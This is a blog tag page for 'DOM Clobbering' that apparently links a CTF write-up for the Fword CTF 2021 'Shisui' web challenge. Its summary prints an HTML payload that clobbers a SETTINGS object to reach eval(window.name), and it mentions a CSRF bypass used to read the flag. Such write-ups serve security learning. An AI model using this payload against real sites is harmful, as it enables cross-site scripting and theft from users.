Skip to main content

Yadhu's Blog

Tag: DOM Clobbering

Shisui - Fword CTF 2021 Write-up

tl;dr

XSS using DOM Clobbering
<a id="showInfos"></a><a id="SETTINGS" name=check data-timezone="aaa" data-location="eval(window.name)"><a id="SETTINGS" name="x">
Bypass CSRF protection to execute XSS and read flag.

August 30, 2021

/2021/08/30/Shisui-Fword-CTF-2021-Write-up/ Yadhu Krishna M

Web Exploitation